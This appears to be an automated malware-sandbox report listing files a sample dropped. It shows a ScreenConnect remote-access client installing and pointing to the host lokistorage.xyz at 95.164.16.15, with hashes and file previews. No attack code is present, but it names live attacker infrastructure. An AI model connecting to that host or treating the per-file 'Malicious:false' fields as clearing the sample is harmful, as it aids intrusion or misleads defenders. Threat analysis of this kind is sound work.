                                                                MD5:41DFF6114A921D7AC5637B8AC9F04DC4
                                                                SHA1:03880D70FA6A268C040025E90BC767D572BA36A0
                                                                SHA-256:2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
                                                                SHA-512:FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="*[not(text()) and not(*)]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):165735
                                                                Entropy (8bit):4.0957845053651
                                                                Encrypted:false
                                                                SSDEEP:768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
                                                                MD5:4D5B6FB68883C7842D5397D54E85ABC2
                                                                SHA1:02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
                                                                SHA-256:6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
                                                                SHA-512:9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1564
                                                                Entropy (8bit):5.254408929629647
                                                                Encrypted:false
                                                                SSDEEP:24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
                                                                MD5:26E0BFF9194950526A0BA294210BAF79
                                                                SHA1:026D99742D35B1ECCB0DF29ECDA19CECE0387C88
                                                                SHA-256:248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
                                                                SHA-512:A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for sel
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):42037
                                                                Entropy (8bit):5.478811092639316
                                                                Encrypted:false
                                                                SSDEEP:768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
                                                                MD5:3E2819DAE208FB16B35E83522C9E1E21
                                                                SHA1:325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
                                                                SHA-256:6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
                                                                SHA-512:6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto
                                                                Process:C:\Users\user\Desktop\lat0Kwfbuj.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):11636736
                                                                Entropy (8bit):7.964563086829888
                                                                Encrypted:false
                                                                SSDEEP:196608:nZs6Uruc9XbQZs6UYZs6UnZs6UvZs6UbZs6U:nnCtxbQntnEnOnkn
                                                                MD5:B93C059F3650CC0213A005E74AB69AD4
                                                                SHA1:9898DA3E87BD67666DFC61CB2FC62451B0870487
                                                                SHA-256:B37CBCCDEAFDC006419B6FA2B6449447B6149E28644B80F06B9E60A46A087E5B
                                                                SHA-512:28AF914985E665CFC6DAF3A1FBDBE0828E42BC7F0D06374503526C7BE6D56FE74440368DE6EA1504A8FB7591EEB955396A80567B6BA6760EB935767C08965B5C
                                                                Malicious:false
                                                                Preview:......................>...........................................................m...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):11636736
                                                                Entropy (8bit):7.964563086829888
                                                                Encrypted:false
                                                                SSDEEP:196608:nZs6Uruc9XbQZs6UYZs6UnZs6UvZs6UbZs6U:nnCtxbQntnEnOnkn
                                                                MD5:B93C059F3650CC0213A005E74AB69AD4
                                                                SHA1:9898DA3E87BD67666DFC61CB2FC62451B0870487
                                                                SHA-256:B37CBCCDEAFDC006419B6FA2B6449447B6149E28644B80F06B9E60A46A087E5B
                                                                SHA-512:28AF914985E665CFC6DAF3A1FBDBE0828E42BC7F0D06374503526C7BE6D56FE74440368DE6EA1504A8FB7591EEB955396A80567B6BA6760EB935767C08965B5C
                                                                Malicious:false
                                                                Preview:......................>...........................................................m...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):11636736
                                                                Entropy (8bit):7.964563086829888
                                                                Encrypted:false
                                                                SSDEEP:196608:nZs6Uruc9XbQZs6UYZs6UnZs6UvZs6UbZs6U:nnCtxbQntnEnOnkn
                                                                MD5:B93C059F3650CC0213A005E74AB69AD4
                                                                SHA1:9898DA3E87BD67666DFC61CB2FC62451B0870487
                                                                SHA-256:B37CBCCDEAFDC006419B6FA2B6449447B6149E28644B80F06B9E60A46A087E5B
                                                                SHA-512:28AF914985E665CFC6DAF3A1FBDBE0828E42BC7F0D06374503526C7BE6D56FE74440368DE6EA1504A8FB7591EEB955396A80567B6BA6760EB935767C08965B5C
                                                                Malicious:false
                                                                Preview:......................>...........................................................m...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):423744
                                                                Entropy (8bit):6.577172033453069
                                                                Encrypted:false
                                                                SSDEEP:6144:IuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv0:IuH2anwohwQUv5uH2anwohwQUv0
                                                                MD5:E6C034B21A772297DAFC1C5AFC0407BA
                                                                SHA1:7B029679D124C7095EA51659F0443ADB9BF5CF2A
                                                                SHA-256:84D904FDE75911AD26077BE69E3EFF2D0C183FAE9D83DF6C961872F42996C22B
                                                                SHA-512:466334955B4E3E49ED409FAE92B33B44266346FE4F0209262102C82117E6A054148FDE15246E3248266C2FCA7E4B55FE249C1D1C00FC660639A895E6E8809078
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI884C.tmp, Author: Joe Security
                                                                Preview:...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}^.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}f.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}c.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):207360
                                                                Entropy (8bit):6.573348437503042
                                                                Encrypted:false
                                                                SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):207360
                                                                Entropy (8bit):6.573348437503042
                                                                Encrypted:false
                                                                SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.1618597099776191
                                                                Encrypted:false
                                                                SSDEEP:12:JSbX72FjITSAGiLIlHVRpMh/7777777777777777777777777vDHF6hZIyFvQlpz:JyTSQI5cW+6F
                                                                MD5:66DDC0CFC391007BEE30E499B2513F04
                                                                SHA1:45DEED198C21E29CF250485C2057CF06A20FB156
                                                                SHA-256:7E1B2F61DB2A141B5167BB83F001255831E1A21BB6D7436A70278A776B14AF3C
                                                                SHA-512:923764AA6A402D927E5B00092ADAC1BB6B08BA887DFEE3E1F95330CC29B9857EA25D1941424F07D872DDC6B9FC19D9C218B5DBE8327083E303C4E29D70E9E086
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.8099886272979215
                                                                Encrypted:false
                                                                SSDEEP:48:d8Ph2uRc06WX4EBT52/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl59:Ah210BTa+KpKfVkud6l/XtQopASlLF
                                                                MD5:FB890F1A0E8414434E029B25BC333FE5
                                                                SHA1:EFD563C8E1B3EF350BB7691C65F83A8F98573C20
                                                                SHA-256:4E8049FC7C63212735EBFFD416118610CEA1D5774409EE2400DABDB241C1A36B
                                                                SHA-512:FFC4887E5F9B10B358D97CCE4AFFCD65C8480F1127BCAD2F7B1E5DC19CDCAA8FF64DEA760A1E2D31A5A1DFC8C775AE40CBF73FCE3BF0B249ED5CAB50C272305B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):435
                                                                Entropy (8bit):5.289734780210945
                                                                Encrypted:false
                                                                SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                Malicious:false
                                                                Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):360001
                                                                Entropy (8bit):5.362999326985519
                                                                Encrypted:false
                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauf:zTtbmkExhMJCIpEO
                                                                MD5:40B8B7AC5E679425F509918D934A67E0
                                                                SHA1:B6F45412563328BF7C0F45D4A204DB951C94B635
                                                                SHA-256:205C15EA047CA237BFDA8180C5A918BAE0342686AAC5D39A3AF02D08B84C5A91
                                                                SHA-512:BF71057029F17DF42B6C158177F2B03F33B1234E8A884103F990357A87FDA60D67719EA96E8BAE0F84DE39B79C1E8E1261E248A951ABB527B27331F427E58FC8
                                                                Malicious:false
                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                Process:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):559
                                                                Entropy (8bit):5.044847974034844
                                                                Encrypted:false
                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsBAv/vXbAa3xT:2dL9hK6E46YPpVvH
                                                                MD5:5EB11EA4AC03B929F59097C55E9FB620
                                                                SHA1:F15A88FE88F22B613BE65F5F4541B3FDCF5D854F
                                                                SHA-256:22AA1ED8B363673D20D6FA8D45E7293C048D62F6E7EF0B59352B91F78CE0E57B
                                                                SHA-512:97C6B28E62C3EAE6AFD3C786804852EF0CD6444FF053C153E7C0CD705EFD14E4CCF7D0B0117D9ED0CF8B197B14FF437B0729C688462657EE6F8B026C83AFFEAD
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):559
                                                                Entropy (8bit):5.044847974034844
                                                                Encrypted:false
                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsBAv/vXbAa3xT:2dL9hK6E46YPpVvH
                                                                MD5:5EB11EA4AC03B929F59097C55E9FB620
                                                                SHA1:F15A88FE88F22B613BE65F5F4541B3FDCF5D854F
                                                                SHA-256:22AA1ED8B363673D20D6FA8D45E7293C048D62F6E7EF0B59352B91F78CE0E57B
                                                                SHA-512:97C6B28E62C3EAE6AFD3C786804852EF0CD6444FF053C153E7C0CD705EFD14E4CCF7D0B0117D9ED0CF8B197B14FF437B0729C688462657EE6F8B026C83AFFEAD
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1590
                                                                Entropy (8bit):5.363907225770245
                                                                Encrypted:false
                                                                SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.428016723651666
                                                                Encrypted:false
                                                                SSDEEP:48:0peuyK+xFX49T5hUc/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+A:UeXeTXf+KpKfVkud6l/XtQopASlLF
                                                                MD5:3DF1741BDC4A091D6C29A3225B4DBB73
                                                                SHA1:F7E5796C616EF1B6A64DA5166D6A2EDD8E70D156
                                                                SHA-256:51D8AA96E90493C1CF3FFABEF40347D0BD156A9CB54DC9751D5450E00AF55F40
                                                                SHA-512:9CAD35B59D88AF089FFB4B2010AD911558E8515810599A2B9F381D7A360538CE05A7BDFDD23EC5ABC73EA3D5592805CA5DEEBFD08361BE4283A8A5C920B3128B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.428016723651666
                                                                Encrypted:false
                                                                SSDEEP:48:0peuyK+xFX49T5hUc/dqNHqcq56AdubSiVkud6S2070B3uQca2iQR6YEwg4Sl5+A:UeXeTXf+KpKfVkud6l/XtQopASlLF
                                                                MD5:3DF1741BDC4A091D6C29A3225B4DBB73
                                                                SHA1:F7E5796C616EF1B6A64DA5166D6A2EDD8E70D156
                                                                SHA-256:51D8AA96E90493C1CF3FFABEF40347D0BD156A9CB54DC9751D5450E00AF55F40
                                                                SHA-512:9CAD35B59D88AF089FFB4B2010AD911558E8515810599A2B9F381D7A360538CE05A7BDFDD23EC5ABC73EA3D5592805CA5DEEBFD08361BE4283A8A5C920B3128B
                                                                Malicious:false
